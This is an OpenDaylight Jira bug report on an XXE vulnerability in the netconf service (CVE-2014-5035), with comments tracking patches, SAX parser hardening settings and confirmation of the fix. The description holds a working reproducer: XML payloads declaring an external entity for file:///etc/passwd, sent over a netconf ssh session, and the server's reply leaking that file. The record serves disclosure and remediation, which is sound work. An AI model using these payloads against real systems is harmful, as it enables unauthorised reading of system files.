[CONTROLLER-1069] XXE vulnerability in netconf service (CVE-2014-5035) Created: 15/Dec/14  Updated: 19/Dec/14  Resolved: 19/Dec/14

Status: Resolved
Project: controller
Component/s: netconf
Affects Version/s: Post-Helium
Fix Version/s: None

Type: Bug
Reporter: David Jorm Assignee: Maros Marsalek
Resolution: Done Votes: 0
Labels: None
Remaining Estimate: Not Specified
Time Spent: Not Specified
Original Estimate: Not Specified
Environment:

Operating System: All
Platform: All

Attachments: Text File xxe.patch    
External issue ID: 2511

 Description   

Back in August, an XXE flaw was reported in ODL's netconf service:

http://seclists.org/bugtraq/2014/Aug/75

It does not appear that his has ever been patched. Using the latest stable/hydrogen code, I can reproduce an attack as shown below. The attached patch should fix it; I would've submitted it via gerrit, but I got:

remote: Resolving deltas: 100% (6/6)
remote: Branch refs/heads/stable/hydrogen:
remote: You are not allowed to perform this operation.
remote: To push into this reference you need 'Push' rights.
remote: User: djorm
remote: Please read the documentation and contact an administrator
remote: if you feel the configuration is incorrect

Reproducer:

$ ssh -s -p 1830 admin@localhost netconf
The authenticity of host '[localhost]:1830 ([::1]:1830)' can't be established.
RSA key fingerprint is 6a:56:d7:5a:2c:bd:4e:da:56:e5:55:9b:69:06:de:71.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[localhost]:1830' (RSA) to the list of known hosts.
Established connection
admin@localhost's password:
<hello xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
<capabilities>
<capability>urn:opendaylight:params:xml:ns:yang:controller:config:netconf:client:dispatcher?module=odl-netconfig-client-cfg&revision=2014-04-08</capability>
<capability>urn:opendaylight:l2:types?module=opendaylight-l2-types&revision=2013-08-27</capability>
<capability>urn:opendaylight:params:xml:ns:yang:controller:netty:threadgroup?module=threadgroup&revision=2013-11-07</capability>
<capability>urn:opendaylight:params:xml:ns:yang:controller:md:sal:binding?module=opendaylight-md-sal-binding&revision=2013-10-28</capability>
<capability>urn:opendaylight:params:xml:ns:yang:controller:config:netconf?module=odl-netconf-cfg&revision=2014-04-08</capability>
<capability>urn:opendaylight:netconf-node-inventory?module=netconf-node-inventory&revision=2014-01-08</capability>
<capability>urn:opendaylight:params:xml:ns:yang:controller:md:sal:core:spi:config-dom-store?module=opendaylight-config-dom-datastore&revision=2014-06-17</capability>
<capability>urn:opendaylight:params:xml:ns:yang:controller:netty:eventexecutor?module=netty-event-executor&revision=2013-11-12</capability>
<capability>urn:ietf:params:xml:ns:yang:ietf-netconf-monitoring?module=ietf-netconf-monitoring&revision=2010-10-04</capability>
<capability>urn:opendaylight:inventory?module=opendaylight-inventory&revision=2013-08-19</capability>
<capability>urn:opendaylight:params:xml:ns:yang:controller:md:sal:binding:impl?module=opendaylight-sal-binding-broker-impl&revision=2013-10-28</capability>
<capability>urn:ietf:params:xml:ns:yang:ietf-inet-types?module=ietf-inet-types&revision=2010-09-24</capability>
<capability>urn:opendaylight:params:xml:ns:yang:controller:md:sal:dom:impl?module=opendaylight-sal-dom-broker-impl&revision=2013-10-28</capability>
<capability>urn:opendaylight:params:xml:ns:yang:controller:threadpool:impl:flexible?module=threadpool-impl-flexible&revision=2013-12-01</capability>
<capability>urn:opendaylight:params:xml:ns:yang:controller:inmemory-datastore-provider?module=opendaylight-inmemory-datastore-provider&revision=2014-06-17</capability>
<capability>urn:opendaylight:params:xml:ns:yang:controller:md:sal:common?module=opendaylight-md-sal-common&revision=2013-10-28</capability>
<capability>urn:opendaylight:params:xml:ns:yang:controller:shutdown?module=shutdown&revision=2013-12-18</capability>
<capability>urn:ietf:params:netconf:base:1.0</capability>
<capability>urn:ietf:params:netconf:base:1.1</capability>
<capability>urn:TBD:params:xml:ns:yang:network-topology?module=network-topology&revision=2013-07-12</capability>
<capability>urn:ietf:params:netconf:capability:exi:1.0</capability>
<capability>urn:opendaylight:params:xml:ns:yang:controller:threadpool?module=threadpool&revision=2013-04-09</capability>
<capability>urn:TBD:params:xml:ns:yang:network-topology?module=network-topology&revision=2013-10-21</capability>
<capability>urn:opendaylight:params:xml:ns:yang:controller:md:sal:dom?module=opendaylight-md-sal-dom&revision=2013-10-28</capability>
<capability>urn:ietf:params:xml:ns:yang:ietf-netconf-monitoring-extension?module=ietf-netconf-monitoring-extension&revision=2013-12-10</capability>
<capability>urn:opendaylight:params:xml:ns:yang:controller:config?module=config&revision=2013-04-05</capability>
<capability>urn:ietf:params:netconf:capability:candidate:1.0</capability>
<capability>urn:ietf:params:xml:ns:yang:ietf-restconf?module=ietf-restconf&revision=2013-10-19</capability>
<capability>urn:ietf:params:xml:ns:yang:rpc-context?module=rpc-context&revision=2013-06-17</capability>
<capability>urn:opendaylight:params:xml:ns:yang:controller:threadpool:impl:scheduled?module=threadpool-impl-scheduled&revision=2013-12-01</capability>
<capability>urn:opendaylight:params:xml:ns:yang:controller:shutdown:impl?module=shutdown-impl&revision=2013-12-18</capability>
<capability>urn:opendaylight:params:xml:ns:yang:controller:protocol:framework?module=protocol-framework&revision=2014-03-13</capability>
<capability>urn:opendaylight:params:xml:ns:yang:controller:netty:timer?module=netty-timer&revision=2013-11-19</capability>
<capability>urn:opendaylight:params:xml:ns:yang:controller:threadpool:impl?module=threadpool-impl&revision=2013-04-05</capability>
<capability>urn:ietf:params:xml:ns:yang:ietf-yang-types?module=ietf-yang-types&revision=2010-09-24</capability>
<capability>urn:ietf:params:xml:ns:yang:ietf-yang-types?module=ietf-yang-types&revision=2013-07-15</capability>
<capability>urn:opendaylight:yang:extension:yang-ext?module=yang-ext&revision=2013-07-09</capability>
<capability>urn:opendaylight:params:xml:ns:yang:controller:netty?module=netty&revision=2013-11-19</capability>
<capability>urn:opendaylight:params:xml:ns:yang:controller:md:sal:core:spi:operational-dom-store?module=opendaylight-operational-dom-datastore&revision=2014-06-17</capability>
<capability>urn:opendaylight:params:xml:ns:yang:controller:md:sal:connector:netconf?module=odl-sal-netconf-connector-cfg&revision=2013-10-28</capability>
<capability>urn:opendaylight:params:xml:ns:yang:controller:threadpool:impl:fixed?module=threadpool-impl-fixed&revision=2013-12-01</capability>
</capabilities>
<session-id>68</session-id>
</hello>
]]>]]><?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<hello xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
<capabilities>
<capability>urn:ietf:params:netconf:base:1.0 &xxe;</capability>
</capabilities>
</hello>]]>]]>

<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<rpc message-id="101" xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
<lock>
<target><running>&xxe;</running></target>
</lock>
</rpc>]]>]]>
<rpc-reply message-id="101" xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
<rpc-error>
<error-type>application</error-type>
<error-tag>operation-not-supported</error-tag>
<error-severity>error</error-severity>
<error-message>Unable to handle rpc <rpc xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="101">
<lock>
<target>
<running>root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rtkit:x:499:497:RealtimeKit:/proc:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
saslauth:x:498:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
qemu:x:107:107:qemu user:/:/sbin/nologin
pulse:x:497:495:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
dfj:x:500:500:David Jorm:/home/dfj:/bin/bash
openvpn:x:496:492:OpenVPN:/etc/openvpn:/sbin/nologin
nm-openconnect:x:495:491:NetworkManager user for OpenConnect:/:/sbin/nologin
tomcat:x:91:91:Apache Tomcat:/usr/share/tomcat6:/sbin/nologin
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
unbound:x:494:490:Unbound DNS resolver:/etc/unbound:/sbin/nologin
kojibuilder:x:493:486::/builddir:/bin/bash
lighttpd:x:492:485:lighttpd web server:/var/www/lighttpd:/sbin/nologin
ldap:x:55:55:LDAP User:/var/lib/ldap:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
memcached:x:491:484:Memcached daemon:/var/run/memcached:/sbin/nologin
</running>
</target>
</lock>
</rpc>
on session NetconfServerSession

{sessionId=68}

</error-message>
<error-info>
<operation_not_supported>No org.opendaylight.controller.netconf.mapping.api.NetconfOperation available to handle message <rpc xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="101">
<lock>
<target>
<running>root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rtkit:x:499:497:RealtimeKit:/proc:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
saslauth:x:498:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
qemu:x:107:107:qemu user:/:/sbin/nologin
pulse:x:497:495:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
dfj:x:500:500:David Jorm:/home/dfj:/bin/bash
openvpn:x:496:492:OpenVPN:/etc/openvpn:/sbin/nologin
nm-openconnect:x:495:491:NetworkManager user for OpenConnect:/:/sbin/nologin
tomcat:x:91:91:Apache Tomcat:/usr/share/tomcat6:/sbin/nologin
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
unbound:x:494:490:Unbound DNS resolver:/etc/unbound:/sbin/nologin
kojibuilder:x:493:486::/builddir:/bin/bash
lighttpd:x:492:485:lighttpd web server:/var/www/lighttpd:/sbin/nologin
ldap:x:55:55:LDAP User:/var/lib/ldap:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
memcached:x:491:484:Memcached daemon:/var/run/memcached:/sbin/nologin
</running>
</target>
</lock>
</rpc>
</operation_not_supported>
</error-info>
</rpc-error>
</rpc-reply>
]]>]]>

 Comments   
Comment by David Jorm [ 15/Dec/14 ]

Attachment xxe.patch has been added with description: XXE patch

Comment by Colin Dixon [ 15/Dec/14 ]

Proposed fix:
https://git.opendaylight.org/gerrit/#/c/13651/

Comment by David Jorm [ 16/Dec/14 ]

Thanks very much for the quick patch, Colin. Unfortunately, this patch will not block parameter entity XXE attacks, or XEE denial of service attacks. To completely block XXE/XEE attacks in a SAX parser, the following configuration is necessary:

.setFeature("http://xml.org/sax/features/external-general-entities", false);
.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
.setXIncludeAware(false);
.setExpandEntityReferences(false);

Optional but not needed:

.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

OpenEXI's SAX wrapper does not seem to expose mechanisms to set all these features. Setting a custom entity handler using .setEntityHandler, which is exposed by OpenEXI, should block all XXE attacks. For details, see:

https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=61702260

I'll file a bug against OpenEXI to address these limitations, but in the interim I think the .setEntityHandler approach should be sufficient for ODL.

Comment by Robert Varga [ 16/Dec/14 ]

Actually the patches are:

NETCONF:
https://git.opendaylight.org/gerrit/13647
https://git.opendaylight.org/gerrit/13648

RESTCONF:
https://git.opendaylight.org/gerrit/13649
https://git.opendaylight.org/gerrit/13650

For EXI, https://git.opendaylight.org/gerrit/#/c/13651/ is still work in progress, and I will address according to David's comments.

Comment by Colin Dixon [ 16/Dec/14 ]

It appears as though the 4 merged patches are actually:
https://git.opendaylight.org/gerrit/#/c/13646/ (NETCONF, stable/helium)
https://git.opendaylight.org/gerrit/#/c/13647/ (NETCONF, master)

https://git.opendaylight.org/gerrit/#/c/13649/ (RESTCONF, master)
https://git.opendaylight.org/gerrit/#/c/13650/ (RESTCONF, stable/helium)

https://git.opendaylight.org/gerrit/#/c/13651/ (Work in Progress on EXI)

Do we know if the first two patches fix the vulnerability. Do we have a test case that we could add to make sure? Once we have these patches, I'd like to start the process of the release.

Comment by David Jorm [ 16/Dec/14 ]

The reproduction steps that I provided in the bug description can be converted into a test case.

Comment by David Jorm [ 17/Dec/14 ]

All the patches in gerrit look good to me. I have tested a patched build with the original reproducer, and the issue is no longer exploitable.

Comment by Colin Dixon [ 19/Dec/14 ]

There is one more non-critical patch:
https://git.opendaylight.org/gerrit/#/c/13730/

This prevents the exploit from being used via a config xml file while installing a Karaf feature as well. It is non-critical as loading a Karaf feature already allows for running of arbitrary code.

Generated at Wed Feb 07 19:54:36 UTC 2024 using Jira 8.20.10#820010-sha1:ace47f9899e9ee25d7157d59aa17ab06aee30d3d.